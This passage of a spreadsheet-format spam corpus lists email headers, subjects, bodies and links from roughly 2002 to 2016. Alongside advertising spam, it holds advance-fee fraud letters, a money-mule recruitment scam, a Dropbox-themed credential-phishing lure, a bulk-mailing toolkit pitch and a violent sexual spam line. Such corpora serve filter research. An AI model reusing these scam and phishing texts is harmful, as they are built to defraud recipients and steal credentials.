ZXRlbnRpb24sIGFuZCBleHRlbmRzDQp0aGUgcHJvZHVjdHMgbGlmZSBzcGFuLg0KDQpCZXNp\nZGVzIG91ciBwcm9kdWN0cyBvbiB3ZWJzaXRlLCB3ZSBub3cgcHJvZHVjZSBzb21lIG5ldyBt\nb2RlbHMgZm9yIFVTQSBtYXJrZXQuDQpXZSBhbHNvIHByb2R1Y2Ugc2hvd2VyIHBhbmVscyB3\naXRoIGZpbmVzdCBxdWFsaXR5Lg0KDQotLS0tLS0tLS0tLS0tLS0tLS0tYmF0aHR1YiBTcGVj\naWZpY2F0aW9ucy0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KMSxXYWxsIHRoaWNrbmVzczoxMG1t\nfjIwbW0NCjIsV2VpZ2h0OiA1MH42MEtHDQoNCi0tLS0tLS0tLS0tLS0tLS0tLS1Db29wZXJh\ndGUtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQpXZSB3b3VsZCBsaWtlIHRv\nIGJlIHlvdXIgT0VNL09ETSBtYW51ZmFjdHVyZXIuDQoNCkZvciBkZXRhaWxlZCBpbmZvLCBw\nbGVhc2UgYnJvd3NlIG91ciB3ZWJzaXRlIGh0dHA6Ly93d3cud2pqenpzLmNvbQ0KDQpCZXN0\nIHdpc2hlcyBhbmQgcmVnYXJkcywNCg0KRXhwb3J0IE1hbmFnZXINCkplcnJ5IExlZQ0KTW9i\naWxlOjEzOTUxMjI4NTYxDQpQaG9uZTowMDg2LTUxOS01MjExOTczDQpGYXg6ICAwMDg2LTUx\nOS01MjA5Nzc2DQpXdWppbiBIdWFuZ2xpIENvbXBvc2l0ZWQgU2FuaXRhcnkgRmFjdG9yeQ0K\nQWRkOkhVYW5nbGkgdG93bixXdWppbiBjb3VudHkNCiAgICBDaGFuZ3pob3UgMjEzMTUxDQog\nICAgSmlhbmdzdSBwcm92aW5jZQ0KICAgIFAuUi5DaGluYQ0KV2Vic2llOmh0dHA6Ly93d3cu\nd2pqenpzLmNvbQ0KRW1haWw6d2pqenpzQHdqanp6cy5jb20NCg0KICAgIA==\n--Z_MULTI_PART_MAIL_BOUNDAEY_S--\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5190</t>
  </si>
  <si>
    <t>To: &lt;yyyy@netnoteinc.com&gt;\nFrom: "Inktime" &lt;MoreInks@netscape.net&gt;\nDate: Wed, 17 Jul 2002 02:35:48 -0700</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 02:35:48 -0700</t>
  </si>
  <si>
    <t>"Inktime" &lt;MoreInks@netscape.net&gt;</t>
  </si>
  <si>
    <t>Your Printer needs Ink</t>
  </si>
  <si>
    <t>| ![]([URL]http://www.totalglobe.net[/URL]  \n---  \n![]([URL]http://www.totalglobe.net[/URL]  \n![]([URL]http://www.totalglobe.net[/URL] |\n\n**This is what are customers are saying  \n![]([URL]http://www.saveoninks.com[/URL]  \n![]([URL]http://www.totalglobe.net[/URL]**_ I was shocked. I\ncan't believe how low the prices are, and the quality of the product is great.\nI will recommend your site to everyone I know.  \n\----------------------------------------------  \n![]([URL]http://www.totalglobe.net[/URL]" Cartridges were half\nof my lowest discount store prices. Delivery was in about 3-5 days. Cartridges\nwork perfectly, so far. I will definitely order again _  \n\------------------------------------------------------------_  \nThe Product is excellent. Ink refill kits, easy to use and saving is\nsubstantial! My order came within three days - much faster than I expected.\nDefinite savings over staples."  \n_\------------------------------------------------------------_  \n![]([URL]http://www.totalglobe.net[/URL]"Cheaper than any place\nelse in town. Why buy new cartridges when you can get perfectly good results\nwith refills for about 20% of original cost.  \n**Savings are real. **__  \n![]([URL]http://www.totalglobe.net[/URL]  \n_**CLICK HERE**  \n  \nTo be removed from our mailing list click on the link below and you will be\nremoved from future mailings click here.\n\n</t>
  </si>
  <si>
    <t>http://www.totalglobe.net http://www.totalglobe.net http://www.totalglobe.net http://www.saveoninks.com http://www.totalglobe.net http://www.totalglobe.net http://www.totalglobe.net http://www.totalglobe.net</t>
  </si>
  <si>
    <t>5186</t>
  </si>
  <si>
    <t>To: Business Professional &lt;bzpro@list21.com&gt;\nFrom: Frontline Learning &lt;learning_that_lasts@yahoo.com&gt;\nDate: Wed, 17 Jul 2002 01:08:06 -0500</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 01:08:06 -0500</t>
  </si>
  <si>
    <t>Frontline Learning &lt;learning_that_lasts@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Business Professional &lt;bzpro@list21.com&gt;</t>
  </si>
  <si>
    <t>Employee Productivity in Tough Times</t>
  </si>
  <si>
    <t>During these tough economic times, how do you help a salesperson, a custo= mer service representative, or ANY employee improve his or her effectiven= ess and productivity if you don't know which SPECIFIC skills, habits or a= ttitudes need to be developed or enhanced?=20 To introduce you to our unique training and development resources, we wou= ld like to offer you a free preview copy of any one of the following asse= ssments: Professional Selling SkillMap=99 Customer Service SkillMap=99 Emotional Effectiveness SkillMap=99 Team Building SkillMap=99 Professional Communication SkillMap=99 You can visit us online at  [URL]www.frontlinelearning.com[/URL]  for more informati= on, and you can request your free SkillMap preview at:  [URL]http://www.frontl[/URL] inelearning.com/contactus1.htm=20 Please note: If you are NOT responsible for enhancing employee productivi= ty within your organization, please feel free to forward this message to = the appropriate individual(s). REMOVE INSTRUCTIONS: To remove yourself from our mailing list, click repl= y and type "REMOVE" in the &gt;SUBJECT&lt; Box.=20</t>
  </si>
  <si>
    <t>www.frontlinelearning.com http://www.frontl</t>
  </si>
  <si>
    <t>5187</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: brut@hotmail.com\nDate: Wed, 17 Jul 2002 00:12:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 00:12:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>brut@hotmail.com</t>
  </si>
  <si>
    <t>RE: Surprise :-)</t>
  </si>
  <si>
    <t>You are just 1 click from The World Of Violence And FORCED SEX The Brutality Of RAPE!!! CLICK HERE TO SEE [ CLICK HERE TO UNSUBSCRIBE ] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5180</t>
  </si>
  <si>
    <t>To: &lt;webmaster@efi.ie&gt;\nFrom: &lt;martenb@aol.com&gt;\nDate: Wed, 17 Jul 0102 05:09:08 +1100</t>
  </si>
  <si>
    <t>Wed, 17 Jul 0102 05:09:08 +1100</t>
  </si>
  <si>
    <t>&lt;martenb@aol.com&gt;</t>
  </si>
  <si>
    <t>Never pay eBay listing fees again!</t>
  </si>
  <si>
    <t>Hi,\n\nI'm a college dropout.  I work about two hours a day.  \nI'm ambitious, but extremely lazy, and I make over \n$250,000 a year.  Are you curious yet?\n\nIn a minute I'm going to tell you my secret,\nit's the dirty little secret of the Internet ...\n\nYou've probably heard stories about people making\nwhopping huge money online, but you thought they \nwere the big corporate execs, famous programmers, or\nboy-geniuses.\n\nWell, grasshopper, think again ...\n\nIt's people like you and me that are making the real\nmoney.  Yep, people like YOU AND ME!\n\nEver since the "dot com bubble" burst in 1999, small-time\nentrepreneurs are getting richer while the Fortune 500 \ncompanies look for bankruptcy lawyers.\n\nToday small business owners and ordinary folks \nlike you and me can use the web to achieve complete \nfinancial freedom with NO INVESTMENT and very little \nwork.  How?  By learning the most profitable marketing \ntechnique ever created - it's called BULK EMAIL.\n\nIf you've ever recieved an email advertisement, then \nyou know what bulk email is.  I bet you can't click on \nDELETE fast enough for most of those ads, right?\nYou might not want their product, but remember that \nthousands of other folks probably do.  Bulk email is a \npercentage game - every bulker who contacts you \nmakes a six figure income on the Internet.  I \nguarantee it.  Now let's go back to Math 101 and \nreview some numbers ...\n\nIf you sell on eBay, you pay anywhere from a few\ndollars to over a hundred dollars just to post one\nauction.  How many people see your ad?  Maybe a\ncouple thousand or even ten or twenty thousand\nover a period of days.  Using bulk email, YOU CAN\nSEND YOUR AD TO MORE THAN A MILLION PEOPLE A DAY\nat virtually no cost.  Whether your send 100,000\nemails or 100 million emails, the price is the same.\nZERO!\n\nStop paying those outrageous auction listing fees when\nhardly anyone sees your ad!\n\nImagine that you have a decent product with a \nprofit margin of $20.00 on each sale.  If you send \nan email ad to 500,000 people, and only one person \nin a thousand actually places an order, then you just \ngenerated 500 orders and made $10,000 in a few hours \nof work.  \n\nIt's that simple ...\n\nAll you have to do is convince ONE PERSON OUT OF A\nTHOUSAND to buy your stuff and you're FILTHY RICH.\n\nThe best thing is that anyone can do it.  Doesn't \nmatter if you're a nineteen-year-old college student \nusing a dorm-room computer or a fifty-year-old \nexecutive working from an office building in New \nYork City.  Anyone, and I repeat ANYONE, can start \nbulk emailing with virtually no startup costs.  All \nit takes is a  few days of study, plenty of ambition, \nand some basic familiarity with the Internet.\n\nI quit college when I was 19 to capitalize on the \n"Dot Com" mania, and I've never looked back.  I \nstarted with no money, no product to sell, and only \nthe most rudimentary computer skills.  I saw an \nopportunity and I seized it.  A few years later, \nI bought my own home - with CASH.  \n\nYou don't need any money.  You don't need a product.\nYou don't need to be a computer nerd and no experience\nwhatsoever is required.  \n\nIf you saw an employment ad in the newspaper like that\nyou'd jump right on it.  It would be a dream come true.\nSo what are you waiting for?!\n\nI'm going to ask you four simple questions.  If you answer\nYES to all of them, then I can almost promise that you\nwill make at least $100,000 using bulk email this year.\n\nHere goes ...\n\nDo you have basic experience with the web? \nDo you have a computer and an Internet connection?\nDo you have a few hours each day of free time?  \nDo you want to earn some extra money with an eye towards \ncomplete financial freedom?  \n\nIf you answer YES to these questions, you could be\nmaking $5,000 - $20,000 per week working from your \nhome.  Kiss your day job goodbye - this sure beats \nthe 9-5 daily grind!\n\nAll you need is ambition and commitment.  This\nis no "get rich quick scheme".  You have to work\nto make big bucks, but ANYONE - and I mean ANYONE - can do \nit.\n\nYou're probably wondering if it's hard to get started.  \nDon't worry, it's not! I will show you step-by-step \nhow to start your first email campaign and how to\nbuild a booming online business.  You'll be generating \norders - AND MAKING MONEY - in less than seven days.\n\nOkay, so what if you don't have anything to sell?\n\nNo problem!!  I'll show you where to find hot\nproducts that sell like CRAAAAAAZY! Most people delay\nstarting an Internet business because they have \nnothing to sell, but I'm removing that hurdle right now.  \nAfter reading the Bulkbook, you can build your complete \nproduct line in less than two hours!  There is NO EXCUSE \nnot to get started! I will get you up-and-running within \nseven days. In fact ...\n\nI personally guarantee that you will start your own \nbulk email campaign less than a week after reading \nthe Bulkbook!  I'll give you a toll-free phone number \nto reach me 24 hours a day, seven days a week; \nwhere else will you find that level of service?!\n\nI will also include a step-by-step guide to starting \nyour very first email campaign called "Seven Days to \nBulk Email Success".  This seperate guide contains a daily \nroutine for you to follow with specific, exact \ninstructions on how to get started.  On day one, for \nexample, I teach you where to find a product to sell. \nThe next day you learn how to build a fresh mailing \nlist.  On the seventh day, you just click send!  Your \nvery first campaign is ready to go.\n\nAs a special bonus, you'll recieve a FREE copy \nof our STEALTH MASS MAILER, a very powerful bulk \nemail program which retails for $49.99! I'll even\ninclude 7 million email addresses absolutely FREE\nif you order NOW!\n\nStop wasting your money on auction listing fees, \nclassifieds, and banner ads - they don't work, and \nnever will!  If you are SERIOUS about making money \non the Internet, bulk email is your only option.  \nWhat are you waiting for?  Few of us are willing \nto share this knowledge, but I promise to teach \nyou everything I know about bulk emailing in this \nextraordinary bulk emailer's handbook ... The Bulkbook! \n\nOnce again, here's the deal.  You give me $29.99.  \nI give you ALL THE TOOLS YOU NEED to become a\nsuccessful, high profit bulk emailer.  INCLUDING:\n\n** THE BULKBOOK\nTeaches you step-by-step how to become a high profit\nbulk emailer.  Secret techniques and tips never\nbefore revealed.\n\n** SEVEN DAYS TO BULK EMAIL SUCCESS\nProvides detailed day-by-day instruction to start sending\nyour first email campaign in seven days.\n\n** 600 Email subjects that PULL LIKE CRAZY\n\n** EMAIL LIST MANAGER\nManage your email lists quickly and easily.  Very \nuser-friendly, yet powerful, software.\n\n** STEALTH MASS MAILER\nSoftware can send up to 50,000 emails an hour automatically.\nJust load them in there and click SEND!\n\n** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT\nExtracts email addresses from databases and search engines\nat speeds of over 200,000 per hour.\n\n** WORLDCAST EMAIL VERIFIER\nUsed to verify your email addresses that you extract to \nmake sure they're valid.\n\n** EBOOK PUBLISHER\nEasily publish your own e-books and reports for resale using,\nyou guessed it, bulk email!\n\n** SEVEN MILLION EMAIL ADDRESSES\nThis huge list will get you started bulking right away.\nI harvested these addresses myself, the list is filled\nwith IMPULSE BUYERS ready to respond to your ads!\n\nIf you added up all of the FULL VERSION BULK EMAIL software\nincluded with the BULKBOOK package, it would total over\n$499.  I am giving you the whole bundle for only $29.99.\nThat means there is no other out-of-pocket startup expense\nfor you.  Nothing else to buy, no reason to waste money on\nsoftware that doesn't work.  With this one package, you get \nEVERYTHING YOU NEED to START BULK EMAILING RIGHT AWAY.  \n\nAre you willing to invest $29.99 for the opportunity\nto make a SIX FIGURE INCOME on the Internet with no \nstartup cash and very little effort?\n\nRemember, you will recieve a toll-free phone number\nfor 24 hour expert advice and consultation FROM ME\nPERSONALLY.\n\nTo order the Bulkbook right now for only $29.99 with \na Visa or Mastercard, please click on the link below. \nThis will take you to our secure server for order \nprocessing:\n\n[URL]http://www.2003marketing.com[/URL]\n\nNote: The Bulkbook will be delivered electronically\nwithin 24 hours. It is not available in printed form. \n\nYou may also pay with cash, check or money\norder by printing the order form below and \nsending it with your payment. \n\n------------------------- CUT HERE ----------------------- \n\nProduct: "The Bulkbook" \nPrice: $29.99 \n\nHOW TO ORDER BY MAIL: Print out this order \nform and send cash, personal check, money \norder or cashier's check to the address listed below: \n\nInternet Products Enterprises Inc.\n45 State St. Unit 253\nMontpelier, VT 05602\n\nYour Shipping Information: \n\nYour Name_____________________________________________ \nYour Address__________________________________________ \nYour City_____________________________________________ \nState / Zip___________________________________________ \nPhone #: _____________________________________________ \n(For problems with your order only. No salesmen will call.) \n\nEmail Address________________________________________ \n\n\nIf paying by credit card, please fill in the information below: \n\nCredit Card Number:________________________________ \nExpiration Date:___________________________ \nSignature:_________________________ \nDate:____________________ \n\n\nIMPORTANT LEGAL NOTE: There are no criminal laws against\nthe non-fraudulent sending of unsolicited commercial email \nin the United States.  However, other countries have passed\nlaws against this form of marketing, so non-US residents \nshould check local regulations before ordering. \n\n***********************************************************\nOur company is strictly opposed to unsolicited email.\nTo be removed from this opt-in list, please send a \nrequest to "bulkexpert@yahoo.com"\n***********************************************************\n1027zbAU4-744CWZI4637aGiQ5-254sWzM249l35</t>
  </si>
  <si>
    <t>http://www.2003marketing.com</t>
  </si>
  <si>
    <t>2872</t>
  </si>
  <si>
    <t>To: nan\nFrom: Harrison Justain &lt;sushiart09120@yahoo.co.uk&gt;\nDate: Wed, 17 Jan 2007 22:34:47 +0100</t>
  </si>
  <si>
    <t>Wed, 17 Jan 2007 22:34:47 +0100</t>
  </si>
  <si>
    <t>Harrison Justain &lt;sushiart09120@yahoo.co.uk&gt;</t>
  </si>
  <si>
    <t>URGENT RESPONSE NEEDED!!!</t>
  </si>
  <si>
    <t>\nHIMAGE INTL LIMITED \n                   \n                   Corporate Headquater \n                   12 HARWELL GROOVE \n                   WINFORD CHESHIRE \n                   CUM 3UR UNITED KINGDOM \n                 \n\nDEAR SIR/MADAM \nMy name is Harrison Justain, a representatives from HIMAGE INTERNATIONAL LIMITED with the headquarter in United Kingdom.\n\nWe recently expanding our sales to US and Canada becuase of the great innovation the company has gained across the world in the marketing of all sort of Electronic apppliances. \nWe have been facing serious difficulties when it comes to selling our products to Americans,interms of payment as majority of them  offer payment with momey order or casher's cheque, which is difficult for us to cash here in London United Kingdom. \n\nWe are presently working on setting up a branch in the state for now and we are urgently in need of a representative in the United States Of America and Canada who will be working for us as a part time staff workers who will be working from home without affecting his/her present job if they have any at hand now and we will be willing to pay 10% for every transaction. \nScope of the work is to receive payments from any of our customers in the states,in terms of money order or cashier's cheque, which will be address to you in your name once you are ready to work as our representative, so all you need do is cash the form of payment and deduct your percentage and send the balance to us after deducting the transfer charges on any transaction. \nNOTE: All charges of the Western  Union money transfer or Money Gram.will be deducted from the money, so you are rest assured that you wouldn't spend any of your personal money. \nIf you are interested, please get back to me as soon as possible via email. \n\nsushiart09120@yahoo.co.uk or sushiart0912@hotmail.com\nN: B, Please send to me the listed information below: \n#Your full name: \n#Your full home address, \n#Your age\n#Occupation  and as well your\n #marital status, and your,\n#direct contact telephone number, \nWe will need your mailing address in order to forward any necessary information across to you. \nLooking forward to your urgent response. \nThanks \n\n\nHarrison Justain \n[URL]www.himage.com[/URL], \nCorporate Headquater \n12 HARWELL GROOVE \nWINFORD CHESHIRE \nCUM 3UR UNITED KINGDOM \n\n__________________________________________________\nTo: R@S\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>www.himage.com</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: finance@skinetex.com\nDate: Wed, 17 Aug 2016 22:22:13 -0700</t>
  </si>
  <si>
    <t>Wed, 17 Aug 2016 22:22:13 -0700</t>
  </si>
  <si>
    <t>finance@skinetex.com</t>
  </si>
  <si>
    <t>Revised agreements</t>
  </si>
  <si>
    <t>Hi\n\nSigned revised agreements has been sent using Dropbox file viewer.\n\n\nPress Here sign in with your email to view the message.\n\n\n\n[URL]http://janiceli.ca[/URL]\n\n</t>
  </si>
  <si>
    <t>http://janiceli.ca</t>
  </si>
  <si>
    <t>1450</t>
  </si>
  <si>
    <t>To: nan\nFrom: mabel1 &lt;mabelndlovu1960@yahoo.com&gt;\nDate: Wed, 17 Aug 2005 15:29:50 -0300</t>
  </si>
  <si>
    <t>Wed, 17 Aug 2005 15:29:50 -0300</t>
  </si>
  <si>
    <t>mabel1 &lt;mabelndlovu1960@yahoo.com&gt;</t>
  </si>
  <si>
    <t>17 August 2005</t>
  </si>
  <si>
    <t>\nFROM:MRS.MABEL NDLOVU\nATTN:\nYou may be surprised to receive this letter from me\nsince you don't know me personally,but for the\nintroduction,I am MRS. MABEL NDLOVU,the wife of\nLate DR.ONOMUA ANDREW NDLOVU who was recently\nmurdered in the land dispute in zimbabwe.\nI got your contact from the INTERNATIONAL TRADE\nCENTRE here in Johhanesburg and decided to write\nyou.My Husband was among the few black Zimbabwe rich\nfamers murdered in the cold blood by the agents of\nthe ruling governmentof President Robert MUGABE for his\nalleged support and sympathy for the Zimbabwean\nopposition party,controlled by the white minority.\nBefore his death,he had taken me to to deposite the\nsum of Five Million Dollars US$ 5M.with a security\nand finance company as if he knew the looming danger in\nZimbabwe. The money was deposited in a box as\ngemstones to avoid much demurrage from the security\ncompany. This money was earmarked for the purchase of new farm\nmachinery and chemicals for the establishment of our new farm in\nlesotho and Swaziland.This land problem arose when president\nRobert MUGABE introduced a new land act,which wholly affected\nthe rich white famers and some blacks vehemently condemned the\nmodusoperand"adopted by the government. This\nresulted to rampant killings and mob actions by the war\nveterans and some political thugs presently,more\nthan SIX-HUNDRED[600]people have so far been killed.Heads of\ngovernment from the west,especially The Great Britain and The\nUnited states of America have voice their condemnation of\nMUGABE'S plan.The South Africa development community (SADEC)has\ncontinuously supported MUGABE'S new land reform\nAct.It is against this background that I and my Children who are\ncurrently staying as REFUGEE in a SOUTH AFRICAN REPUBLIC but\ncurrently seeking An ASSYLUM in any of THE THE WEST AFRICAN\nCOUNTRIES have decided to transfer my late Husband's money into\na foreign\naccount. As the only and LEGITIMATE -WIFE of my late\nhusband I am saddled with the responsibility of seeking a\ngenuine foreign account where this money could be\ntransfer without theknowledge of my country's\ngovernment who are tatically freezing our\nfamilieswealthback home in ZIMBABWE and The South\nAfrica government seems to be playing along with\nthem. I am faced with the delimma of investing this amount of\nmoney in The South Africa Republic for the fear of encountering\nthe same experience in future since both countries have almost\nthe same political history.Moreso ,the South Africa Financial\nforeign exchange policy does not allow such investment hence\nI am seeking for Assistance.As a business person whom\nI must entrust my future and that of my family on his\nhands,I must let you know that this transfer is 100%\nRISK FREE . Therefore if you accept to assist my family,we are\nwilling to offer you 20% of the total sum for your assitance,70%\nfor me and my family,while 10% will be mapped out for all\nexpenses.I would wish to invest in your country on REAL- ESTATE\nbased on your advice and I would also receive assurance that you\nwould'nt sit on this money when transfered into your personal\nor company account. If this PLEA is acceptable by you please do\nsend me your personaldetails,Name and Address,telephone and fax numbers .\nYou should know that this business is highly confidential and shall\nbe kept within you alone.I hope to hear from you soon\non the  email address bellow.\n\n(mabel45@ureach.com)\n\nThanks,\n\nBest Regards,\nMRS MABEL NDLOVU.\n\n\n \n\n___________________________________________________________________________\nMail sent from WebMail service at - [URL]http://yoursitenamehere.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://yoursitenamehere.com</t>
  </si>
  <si>
    <t>1581</t>
  </si>
  <si>
    <t>To: henryokoye1@pochta.ru\nFrom: Mr Henry Okoye [henryokoye1@pochta.ru] &lt;hen_okoye7@myway.com&gt;\nDate: Wed, 16 Nov 2005 15:20:11 +0300</t>
  </si>
  <si>
    <t>Wed, 16 Nov 2005 15:20:11 +0300</t>
  </si>
  <si>
    <t>Mr Henry Okoye [henryokoye1@pochta.ru] &lt;hen_okoye7@myway.com&gt;</t>
  </si>
  <si>
    <t>henryokoye1@pochta.ru</t>
  </si>
  <si>
    <t>Greeting  from henry.</t>
  </si>
  <si>
    <t>Dear friend,\n\nGreetings, I am Mr.Henry Okoye the Account Manager of Late Mr.  Morris \nThompson in Standard Trust Bank Regional Office in Victoria island, here \nin Lagos.However I got your contact through the International web \ndirectory.I decided to contact you by email because I feel that it is \nmore secured and private.\n\nRecently we discovered a Dormant Account with a huge amount of Money \nValued USD35,000,000.00 (Thirty Five Million Dollars only)that belongs to \none of our late Customer who died in a plane crash .During our \ninvestigation and auditing in this bank, my department came across a very \nhuge sum of money belonging to Late Mr.  Morris Thompson an American \ngreat  industrialist and a resident of Alaska, who  unfortunately lost \nhis life in the plane  crash of Alaska Airlines Flight 261 which crashed \non January 31  2000,including his wife and only daughter. \n\nYou shall read more news about the crash on  visiting this site which I \ngot during my  investigation;\n[URL]http://www.cnn.com[/URL]\nand\n[URL]http://www.nativefederation.org[/URL]\n\n\nThe fund has been dormant in his account With this Bank without any claim \nof the funds in our custody either from his family or relation before our \ndiscovery of this development.\n\nThe Banking law here stipulates that if such money remains unclaimed for \nfive years, it will be for feited no the Bank treasury as an unclaimed \nbill.It is only a foreigner that can stand as a next of kin and It is \nupon this discovery that I decided to contact you to collaborate with you \nto pull out this dormant fund. In order to avert this negative \ndevelopment, I on behalf of my trusted colleagues now seek your \npermission to have you stand in as next of kin to Our late Customer so \nthat the fund will be released and paid into your account as the \nbeneficiary.s next of kin now that the bank is still expecting a next of \nkin or relative of the deceased ,Late Mr.  Morris Thompson.\n\nIn fact we could have done this deal alone but because of our position in \nthis country as civil servants, we are not allowed to operate a foreign \naccount and that would eventually raise an eye brow on our side during \nthe time of transfer since we still work in this bank,this is the actual \nreason why we required a second party or fellow who will assist us \nforward claims as the next of kin and also provide either an existing \nbank account or to set up a new Bank a/c immediately\nto receive this fund, even an empty a/c can also serve for this purpose.\n\nOn smooth conclusion of this transaction, you will be entitled to 40% as \ngratification for your assisting us, and the remaining 60% will be for me \nand my partners.\n\nWhat I want from you is for you to act as the deceased next of kin. I \nhave in my possession, all the necessary Documents to successfully \naccomplish the operation. Bear in mind that this proposal is 100% risk \nfree.\n\nFurther Information will be given to you as soon as I receive your \npositive response. I suggest you get back to me as soon as possible \nstating your wish. Find in the attachment of my Family Picture, to proof \nwho I am.\n\nI await your Urgent Responce, \n\nRegrads,\n\nMr.Henry Okoye\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.cnn.com http://www.nativefederation.org</t>
  </si>
  <si>
    <t>1191</t>
  </si>
  <si>
    <t>To: nan\nFrom: secretary_bhf &lt;secretary_bhf@yahoo.com.hk&gt;\nDate: Wed, 16 Mar 2005 01:58:38 +0100</t>
  </si>
  <si>
    <t>Wed, 16 Mar 2005 01:58:38 +0100</t>
  </si>
  <si>
    <t>secretary_bhf &lt;secretary_bhf@yahoo.com.hk&gt;</t>
  </si>
  <si>
    <t>Attn:Project Mail/Representative Required/bao 076</t>
  </si>
  <si>
    <t>\n\n\nBAOFULONG HANDICRAFT FACTORY.\nPlot 24, Des Voeux RD.\nCentral Hongkong\nHongkong.\nTel:+762-763-590\nFax:+762-763-591\n[URL]www.baofulong.com[/URL]\n \n \nDear Sir/Madam,\n I am Mrs.Lui Chen Woo,we got your contact via email directory.We are a group(co-operative) we recently included;Crafts and Art works to our list of products and export into Canadian andAmerican Industrial market. We are searching for representatives who can help us establish a medium of getting to our costumers in these Areas.If you are interested in transacting business with us,we will be very glad.Contact us for more information.\nSubject to your satisfaction you will be given the opportunity to negotiate your mode of which we will pay for your services as our official representativein your province.If you are interested forward to the personnel manager:\nMr. Wanq Qin\nEmail: info_baofulong@mail.hongkong.com\n \n 1.Full names\n 2.Phone number/fax\n 3.Full contact address( not P. O. Box).\n \n Thanks,\n Mrs. Lui Chen Woo\n (Secretary)\n BAOFULONG HANDICRAFT FACTORY\n \n NB:Pls quote app/3475/chen01 in your correspondence with us.\n\n\n\n  \n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site\n- [URL]http://yoursite.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>www.baofulong.com http://yoursite.com</t>
  </si>
  <si>
    <t>4843</t>
  </si>
  <si>
    <t>To: "webmaster@efi.ie" &lt;webmaster@efi.ie&gt;\nFrom: Christine Hall &lt;christine@trafficmagnet.net&gt;\nDate: Wed, 15 May 2002 23:17:45 +0800</t>
  </si>
  <si>
    <t>Wed, 15 May 2002 23:17:45 +0800</t>
  </si>
  <si>
    <t>Christine Hall &lt;christine@trafficmagnet.net&gt;</t>
  </si>
  <si>
    <t>"webmaster@efi.ie" &lt;webmaster@efi.ie&gt;</t>
  </si>
  <si>
    <t>http://www.efi.ie</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format --6b68a94d-e09d-4085-9e4a-425d259a6579 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Hi       I visited [URL]http://www.efi.ie[/URL], and        noticed that you're not listed on some search engines! I think we can = offer        you a service which can help you increase traffic and the number of = visitors        to your website.       I would like to introduce you to TrafficMagnet.net. We offer a unique = technology        that will submit your website to over 300,000 search engines and = directories        every month.       You'll be surprised by the low cost, and by how effective this website = promotion        method can be.        To find out more about TrafficMagnet and the cost for submitting your = website        to over 300,000 search engines and directories, visit [URL]www.TrafficMagnet.net[/URL]               I would love to hear from you.        Best Regards,       Christine Hall        Sales and Marketing        E-mail: christine@trafficmagnet.net  [URL]http://www.TrafficMagnet.net[/URL]   --6b68a94d-e09d-4085-9e4a-425d259a6579--</t>
  </si>
  <si>
    <t>http://www.efi.ie www.TrafficMagnet.net http://www.TrafficMagnet.net</t>
  </si>
  <si>
    <t>4853</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "TBA" &lt;tba@insurancemail.net&gt;\nDate: Wed, 15 May 2002 22:32:36 -0400</t>
  </si>
  <si>
    <t>Wed, 15 May 2002 22:32:36 -0400</t>
  </si>
  <si>
    <t>9.05% Guaranteed Annuity @ 8% Commission</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_8A2A7_01C1FC44.0A86D9F0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  8% Annuity Comissions!  From the TBA Annuity Doctor  8% Commission=0A= 9.05% year one=0A= 5.05% guaranteed years 2-6=0A= A++ Best Carrier  Guaranteed  	 =09  Call Today for Details! Click Here for a Test Drive! =20  =20  800-624-4502 ext. 13=09 ? or ? Please fill out the form below for more information	=20 Name:	  =09 E-mail:	  =09 Phone:	  =09 City:	  	State:	  	 =09  	  	 	   =09 =20 Don't forget -- we also do Impaired Risk Life! [URL]www.TBA.com[/URL] =20  =20 We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL] =20 Legal Notice  =20 ------=_NextPart_000_8A2A7_01C1FC44.0A86D9F0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable 9.05% Guaranteed Annuity @ 8% Commission =20     =20        =20            =20                               =20            =20            =20            — or — =20                  =20                      =20                         Please fill = out the form below for more information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                           =20                              =20                            Don't forget -- we = also do Impaired Risk Life!               =20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8A2A7_01C1FC44.0A86D9F0--</t>
  </si>
  <si>
    <t>www.TBA.com http://www.Insurancemail.net http://www.Insurancemail.net</t>
  </si>
  <si>
    <t>4845</t>
  </si>
  <si>
    <t>To: yyyy-register-com@spamassassin.taint.org\nFrom: "Register.com" &lt;register_support@e.register.com&gt;\nDate: Wed, 15 May 2002 16:31:21 -0000</t>
  </si>
  <si>
    <t>Wed, 15 May 2002 16:31:21 -0000</t>
  </si>
  <si>
    <t>"Register.com" &lt;register_support@e.register.com&gt;</t>
  </si>
  <si>
    <t>yyyy-register-com@spamassassin.taint.org</t>
  </si>
  <si>
    <t>New ccTLD! Get yyyyason.us Before Someone Else Does!</t>
  </si>
  <si>
